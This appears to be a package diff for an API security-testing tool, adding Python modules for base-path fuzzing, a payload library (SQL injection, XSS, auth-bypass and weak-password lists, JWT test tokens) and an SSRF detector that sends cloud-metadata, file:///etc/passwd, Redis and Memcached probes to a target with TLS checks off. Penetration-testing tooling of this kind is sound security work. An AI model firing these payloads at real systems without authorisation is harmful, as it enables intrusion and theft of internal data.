opencode-api-security-testing 2.1.0 → 2.1.1

package/core/utils/base_path_dict.py

@@ -0,0 +1,255 @@
+"""
+API Base Path 字典 - 常见API前缀/父路径
+当无法从JS中获取baseURL时使用此字典进行fuzzing
+"""
+
+# 常见API前缀/父路径（按优先级排序）
+COMMON_API_PREFIXES = [
+    # 标准REST API
+    "/api",
+    "/api/v1",
+    "/api/v2", 
+    "/api/v3",
+    "/api/rest",
+    
+    # 常见变体
+    "/webapi",
+    "/openapi",
+    "/rest",
+    "/rest/api",
+    "/api/rest",
+    
+    # 管理类
+    "/admin",
+    "/manager",
+    "/backend",
+    "/server",
+    "/service",
+    
+    # 认证类
+    "/auth",
+    "/oauth",
+    "/oauth2",
+    "/public",
+    
+    # 业务类
+    "/user",
+    "/users",
+    "/customer",
+    "/customers",
+    "/order",
+    "/orders",
+    "/product",
+    "/products",
+]
+
+# 常见后端技术栈默认端口对应
+TECH_STACK_PORTS = {
+    "java": [8080, 8443, 8000, 9000],
+    "python": [5000, 8000, 8001],
+    "nodejs": [3000, 3001, 8080],
+    "php": [80, 8080, 443],
+    "go": [8080, 8000, 9090],
+    "asp.net": [80, 443, 8080],
+}
+
+# 常见API路径模式（用于识别已发现的API的父路径）
+API_PATH_PATTERNS = [
+    # user相关
+    r"/user/([^/]+)",  # /user/login, /user/info
+    r"/users?/([^/]+)",
+    
+    # auth相关
+    r"/auth/([^/]+)",
+    r"/oauth/([^/]+)",
+    
+    # admin相关
+    r"/admin/([^/]+)",
+    r"/manage/([^/]+)",
+    
+    # api相关
+    r"/api/([^/]+)",
+    r"/v([0-9]+)/([^/]+)",
+]
+
+# 完整的base_path fuzzing字典（组合前缀）
+BASE_PATH_FUZZ_PATTERNS = [
+    # 直接拼接常见前缀
+    "/api/{}",
+    "/api/v1/{}",
+    "/api/v2/{}",
+    "/webapi/{}",
+    "/rest/{}",
+    "/auth/{}",
+    "/admin/{}",
+    "/backend/{}",
+    
+    # 带版本的
+    "/{}/v1",
+    "/{}/v2",
+    "/{}/v3",
+    
+    # 带api前缀
+    "/api/{}/v1",
+    "/api/{}/v2",
+]
+
+def get_base_path_candidates(discovered_path):
+    """
+    根据已发现的API路径生成可能的base_path候选
+    
+    例如:
+    - discovered = "/user/login" -> candidates = ["/user", "/", ""]
+    - discovered = "/api/v1/user/info" -> candidates = ["/api/v1", "/api", "/"]
+    """
+    candidates = []
+    parts = discovered_path.strip("/").split("/")
+    
+    for i in range(1, len(parts)):
+        candidate = "/" + "/".join(parts[:i])
+        candidates.append(candidate)
+    
+    candidates.append("/")  # 根路径
+    candidates.append("")   # 空路径（相对路径）
+    
+    return list(set(candidates))
+
+
+def generate_fuzz_paths(path, prefixes=None):
+    """
+    生成fuzzing用的完整路径列表
+    
+    参数:
+        path: 已发现的API路径（如 "user/login"）
+        prefixes: 自定义前缀列表（可选）
+    
+    返回:
+        完整的fuzzing路径列表
+    """
+    if prefixes is None:
+        prefixes = COMMON_API_PREFIXES
+    
+    fuzz_paths = []
+    path_parts = path.strip("/").split("/")
+    
+    # 生成各种组合
+    for prefix in prefixes:
+        # prefix + 完整path
+        fuzz_paths.append(f"{prefix}/{path}")
+        
+        # prefix + 最后一个path
+        if path_parts:
+            fuzz_paths.append(f"{prefix}/{path_parts[-1]}")
+    
+    # 加上原始path
+    fuzz_paths.append("/" + path)
+    fuzz_paths.append(path)
+    
+    return list(set(fuzz_paths))
+
+
+# 测试
+if __name__ == "__main__":
+    print("=== Base Path Dictionary ===")
+    print(f"Common prefixes: {len(COMMON_API_PREFIXES)}")
+    print(f"Tech stack ports: {len(TECH_STACK_PORTS)}")
+    
+    print("\n=== Candidates for /api/v1/user/login ===")
+    candidates = get_base_path_candidates("/api/v1/user/login")
+    for c in candidates:
+        print(f"  {c}")
+    
+    print("\n=== Fuzz paths for 'user/login' ===")
+    fuzz_paths = generate_fuzz_paths("user/login")
+    for p in fuzz_paths[:10]:
+        print(f"  {p}")
+
+
+def get_base_path_multi_dimensional(target_url, js_content=None, headers=None):
+    """
+    【新增】多维度获取base_path
+    
+    维度1: 从JS配置中获取baseURL
+    维度2: 从响应头分析nginx/后端技术
+    维度3: 从已发现API路径反推
+    维度4: 探测常见后端端口
+    维度5: 分析URL模式推断
+    
+    输入:
+        target_url: 目标URL
+        js_content: JS内容（可选）
+        headers: 响应头（可选）
+    
+    输出:
+        {
+            base_path: string - 发现的base_path,
+            confidence: float - 置信度,
+            source: string - 来源,
+            candidates: [] - 候选路径
+        }
+    """
+    import requests
+    requests.packages.urllib3.disable_warnings()
+    
+    result = {
+        'base_path': None,
+        'confidence': 0.0,
+        'source': None,
+        'candidates': []
+    }
+    
+    # 维度1: 从JS配置获取
+    if js_content:
+        import re
+        baseurls = re.findall(r'baseURL\s*:\s*["\']([^"\']+)["\']', js_content)
+        if baseurls and baseurls[0]:
+            result['base_path'] = baseurls[0]
+            result['confidence'] = 1.0
+            result['source'] = 'js_config'
+            return result
+    
+    # 维度2: 从响应头分析
+    try:
+        resp = requests.head(target_url, timeout=5, verify=False)
+        server = resp.headers.get('Server', '')
+        powered_by = resp.headers.get('X-Powered-By', '')
+        
+        # nginx特征
+        if 'nginx' in server.lower():
+            result['candidates'].append('')
+            result['candidates'].append('/api')
+            if 'nginx' in server.lower():
+                result['confidence'] = 0.6
+                result['source'] = 'nginx_proxy'
+        
+        # PHPStudy
+        if 'PHP' in powered_by:
+            result['candidates'].append('')
+            result['candidates'].append('/api')
+        
+    except:
+        pass
+    
+    # 维度3: 从URL路径推断
+    parsed = requests.packages.urllib3.util.urlparse(target_url)
+    path_parts = parsed.path.strip('/').split('/')
+    
+    # 如果URL包含登录页路径
+    if 'login' in parsed.path.lower():
+        # 尝试获取根路径
+        candidates = [
+            '',  # 相对路径
+            '/api',
+            '/auth',
+            '/user',
+            '/' + path_parts[0] if path_parts else '',
+        ]
+        result['candidates'].extend([c for c in candidates if c])
+        result['confidence'] = 0.5
+        result['source'] = 'url_inference'
+    
+    # 维度4: 返回最可能的候选
+    if result['candidates']:
+        result['base_path'] = result['candidates'][0]
+    
+    return result

package/core/utils/payload_lib.py

@@ -0,0 +1,167 @@
+"""
+Payload库 - 管理测试Payload
+输入: {type, count}
+输出: {payloads, descriptions, risk_levels}
+"""
+
+# SQL注入Payload
+SQLI_PAYLOADS = [
+    # 基于错误的注入
+    "' OR '1'='1",
+    "' OR '1'='1' --",
+    "' OR '1'='1' #",
+    "admin'--",
+    "admin' OR '1'='1",
+    
+    # UNION注入
+    "' UNION SELECT NULL--",
+    "' UNION SELECT NULL,NULL--",
+    "' UNION SELECT 1,2,3--",
+    "1' UNION SELECT NULL--",
+    
+    # 布尔注入
+    "1' AND '1'='1",
+    "1' AND '1'='2",
+    "1' OR '1'='1",
+    
+    # 时间盲注
+    "1' AND SLEEP(5)--",
+    "1'; WAITFOR DELAY '00:00:05'--",
+    
+    # 二次注入
+    "test'--",
+]
+
+# XSS Payload
+XSS_PAYLOADS = [
+    "<script>alert(1)</script>",
+    "<img src=x onerror=alert(1)>",
+    "'><script>alert(String.fromCharCode(88,83,83))</script>",
+    "<svg/onload=alert(1)>",
+    "javascript:alert(1)",
+    "<iframe src=javascript:alert(1)>",
+    "<body onload=alert(1)>",
+    "<input onfocus=alert(1) autofocus>",
+]
+
+# IDOR测试ID
+IDOR_TEST_IDS = [
+    1, 2, 3, 4, 5, 10, 100, 999, 9999,
+    "admin", "test", "user",
+    "a" * 32,
+]
+
+# JWT测试
+JWT_PAYLOADS = [
+    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c",
+    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTM1OTk2MjU2LCJleHAiOjE5MTc1NTYyNTYsIm5iZiI6MTUzNTk5NjI1NiwianRpIjoiIiwic3ViIjoiYWRtaW4iLCJyb2xlIjoiUk9MRV9BRE1JTiJ9",
+]
+
+# 认证绕过Payload
+AUTH_BYPASS_PAYLOADS = [
+    {"username": "admin", "password": "admin"},
+    {"username": "admin", "password": "123456"},
+    {"username": "admin", "password": "admin123"},
+    {"username": "test", "password": "test"},
+    {"username": "' OR '1'='1", "password": "any"},
+    {"username": "admin'--", "password": "any"},
+    {"username": "1' OR '1'='1", "password": "1"},
+]
+
+# 弱密码
+WEAK_PASSWORDS = [
+    "123456", "password", "admin", "admin123",
+    "123123", "000000", "111111", "12345678",
+    "qwerty", "abc123", "1234", "12345"
+]
+
+
+def get_payloads(config):
+    """
+    获取Payload库
+    
+    输入:
+        type: "sqli" | "xss" | "idor" | "jwt" | "auth_bypass"
+        count?: number - 返回数量
+    
+    输出:
+        payloads: string[]
+        descriptions: string[]
+        risk_levels: string[]
+    """
+    payload_type = config.get('type', 'sqli')
+    count = config.get('count', 10)
+    
+    if payload_type == 'sqli':
+        payloads = SQLI_PAYLOADS[:count]
+        descriptions = [
+            "通用布尔注入",
+            "注释绕过",
+            "OR注入",
+            "管理员绕过",
+            "UNION注入",
+        ] * (count // 5 + 1)
+        risk_levels = ['high'] * count
+    
+    elif payload_type == 'xss':
+        payloads = XSS_PAYLOADS[:count]
+        descriptions = [
+            "script标签",
+            "img标签onerror",
+            "script标签绕过",
+            "svg标签",
+            "javascript伪协议",
+        ] * (count // 5 + 1)
+        risk_levels = ['high'] * count
+    
+    elif payload_type == 'idor':
+        payloads = IDOR_TEST_IDS[:count]
+        descriptions = ["数字ID"] * count
+        risk_levels = ['medium'] * count
+    
+    elif payload_type == 'jwt':
+        payloads = JWT_PAYLOADS[:count]
+        descriptions = ["JWT测试token"] * count
+        risk_levels = ['high'] * count
+    
+    elif payload_type == 'auth_bypass':
+        payloads = AUTH_BYPASS_PAYLOADS[:count]
+        descriptions = ["弱口令", "SQL注入绕过"] * (count // 2 + 1)
+        risk_levels = ['high'] * count
+    
+    else:
+        payloads = []
+        descriptions = []
+        risk_levels = []
+    
+    return {
+        'payloads': payloads[:count],
+        'descriptions': descriptions[:count],
+        'risk_levels': risk_levels[:count]
+    }
+
+
+def get_sqli_payloads():
+    """获取SQL注入Payload"""
+    return SQLI_PAYLOADS
+
+
+def get_xss_payloads():
+    """获取XSS Payload"""
+    return XSS_PAYLOADS
+
+
+def get_idor_test_ids():
+    """获取IDOR测试ID"""
+    return IDOR_TEST_IDS
+
+
+def get_weak_passwords():
+    """获取弱密码列表"""
+    return WEAK_PASSWORDS
+
+
+if __name__ == '__main__':
+    # 测试
+    result = get_payloads({'type': 'sqli', 'count': 5})
+    print(f"Payloads: {result['payloads']}")

package/core/utils/ssrf_detector.py

@@ -0,0 +1,220 @@
+"""
+SSRF漏洞检测模块
+
+检测API中的SSRF（服务器端请求伪造）漏洞
+"""
+
+import requests
+import re
+
+requests.packages.urllib3.disable_warnings()
+
+
+def detect_ssrf(target_url, api_path, param_name='url', method='GET'):
+    """
+    检测SSRF漏洞
+    
+    输入:
+        target_url: 目标URL（如 http://example.com）
+        api_path: API路径（如 /hszh/WxApi/getTQUserInfo）
+        param_name: 可能存在SSRF的参数名
+        method: 请求方法（GET/POST）
+    
+    输出:
+        {
+            vulnerable: boolean,
+            findings: [],
+            confidence: float
+        }
+    """
+    result = {
+        'vulnerable': False,
+        'findings': [],
+        'confidence': 0.0
+    }
+    
+    full_url = target_url.rstrip('/') + api_path
+    
+    # SSRF测试payloads
+    ssrf_payloads = [
+        # 本地回环
+        ('http://127.0.0.1', 'Localhost'),
+        ('http://127.0.0.1:8080', 'Localhost:8080'),
+        ('http://localhost', 'localhost'),
+        ('http://0.0.0.0', '0.0.0.0'),
+        
+        # 云元数据
+        ('http://169.254.169.254/latest/meta-data/', 'AWS Metadata'),
+        ('http://metadata.google.internal/', 'GCP Metadata'),
+        
+        # 内网探测
+        ('http://192.168.1.1', 'Private IP'),
+        ('http://10.0.0.1', '10.x Private'),
+        ('http://172.16.0.1', '172.16.x Private'),
+        
+        # 协议变种
+        ('file:///etc/passwd', 'File Protocol'),
+        ('dict://127.0.0.1:11211/stats', 'Memcached'),
+        ('gopher://127.0.0.1:6379/_INFO', 'Redis'),
+    ]
+    
+    for payload, description in ssrf_payloads:
+        try:
+            if method == 'POST':
+                r = requests.post(full_url, data={param_name: payload}, verify=False, timeout=5)
+            else:
+                r = requests.get(full_url, params={param_name: payload}, verify=False, timeout=5)
+            
+            # 检查响应判断是否成功探测
+            findings = analyze_ssrf_response(r, payload, description)
+            result['findings'].extend(findings)
+            
+        except requests.exceptions.Timeout:
+            result['findings'].append({
+                'payload': payload,
+                'description': description,
+                'type': 'timeout',
+                'info': '请求超时，可能存在防火墙'
+            })
+        except Exception as e:
+            result['findings'].append({
+                'payload': payload,
+                'description': description,
+                'type': 'error',
+                'info': str(e)[:50]
+            })
+    
+    # 判断是否有SSRF
+    if result['findings']:
+        success_findings = [f for f in result['findings'] if f['type'] == 'ssrf_found']
+        if success_findings:
+            result['vulnerable'] = True
+            result['confidence'] = min(1.0, len(success_findings) * 0.3 + 0.4)
+    
+    return result
+
+
+def analyze_ssrf_response(response, payload, description):
+    """
+    分析响应判断是否为SSRF
+    
+    返回:
+        list - 发现的问题
+    """
+    findings = []
+    
+    # 检查是否有请求发送（响应时间异常）
+    elapsed = response.elapsed.total_seconds()
+    if elapsed > 3 and 'localhost' in payload.lower():
+        findings.append({
+            'payload': payload,
+            'description': description,
+            'type': 'slow_response',
+            'info': f'响应时间 {elapsed:.1f}秒，可能连接到内部服务'
+        })
+    
+    # 检查响应内容
+    response_text = response.text.lower()
+    
+    # 检测内网服务响应特征
+    ssrf_indicators = {
+        'aws_metadata': ['ami-id', 'instance-id', 'local-hostname', 'local-ipv4'],
+        'redis': ['redis_version', 'connected_clients', 'role:'],
+        'memcached': ['stats', 'version', 'pid'],
+        'http_banner': ['server:', 'apache', 'nginx', 'microsoft', 'tomcat'],
+        'internal_error': ['connection refused', 'connection timeout', 'no route to host'],
+    }
+    
+    for indicator_type, keywords in ssrf_indicators.items():
+        for keyword in keywords:
+            if keyword in response_text:
+                findings.append({
+                    'payload': payload,
+                    'description': description,
+                    'type': 'ssrf_found',
+                    'info': f'发现{indicator_type}特征: {keyword}',
+                    'severity': 'high'
+                })
+                break
+    
+    # 检查是否是200状态码但响应异常（可能代理了请求）
+    if response.status_code == 200:
+        if 'html' not in response.headers.get('content-type', '').lower():
+            if len(response.text) < 100 and 'error' not in response_text:
+                findings.append({
+                    'payload': payload,
+                    'description': description,
+                    'type': 'ssrf_suspect',
+                    'info': f'小响应({len(response.text)}字节)，可能是代理响应',
+                    'severity': 'medium'
+                })
+    
+    return findings
+
+
+def check_ssrf_params(js_content):
+    """
+    从JS内容中检测可能存在SSRF的参数
+    
+    输入:
+        js_content: JS文件内容
+    
+    输出:
+        ssrf_params: [{
+            param: string,
+            context: string,
+            api_path: string
+        }]
+    """
+    import re
+    
+    ssrf_params = []
+    
+    # 常见的SSRF敏感参数
+    ssrf_param_names = [
+        'url', 'uri', 'path', 'site', 'html', 'val', 'validate',
+        'domain', 'callback', 'page', 'feed', 'host', 'port', 'to',
+        'out', 'view', 'dir', 'ip', 'name', 'tqToken', 'userToken',
+        'file', 'reference', 'redirect', 'next', 'data', 'q', 'urlEncoded',
+        'xml', 'xsl', 'template', 'php_path', 'style', 'doc', 'img'
+    ]
+    
+    # 查找这些参数的使用
+    for param in ssrf_param_names:
+        # 查找param作为key的使用
+        pattern = rf'["\']({param})["\']\s*:\s*["\']([^"\']+)["\']'
+        matches = re.findall(pattern, js_content, re.I)
+        
+        for m in matches:
+            param_name, param_value = m
+            if any(x in param_value.lower() for x in ['http', 'file://', 'ftp']):
+                ssrf_params.append({
+                    'param': param_name,
+                    'value': param_value,
+                    'context': 'url_value_found',
+                    'risk': 'high'
+                })
+    
+    # 查找http请求模式
+    http_patterns = [
+        r'(?:url|uri|path)\s*[:=]\s*[\"\'](https?://[^\s"\']+)[\"\']',
+        r'(?:url|uri|path)\s*:\s*[\w.]+\s*\(\s*[\"\'](https?://[^\s"\']+)[\"\']',
+    ]
+    
+    for pattern in http_patterns:
+        matches = re.findall(pattern, js_content, re.I)
+        for m in matches:
+            ssrf_params.append({
+                'param': 'url_in_code',
+                'value': m,
+                'context': 'hardcoded_url',
+                'risk': 'low'
+            })
+    
+    return ssrf_params
+
+
+if __name__ == '__main__':
+    # 测试
+    result = check_ssrf_params('url="http://example.com"')
+    print(f"SSRF params: {result}")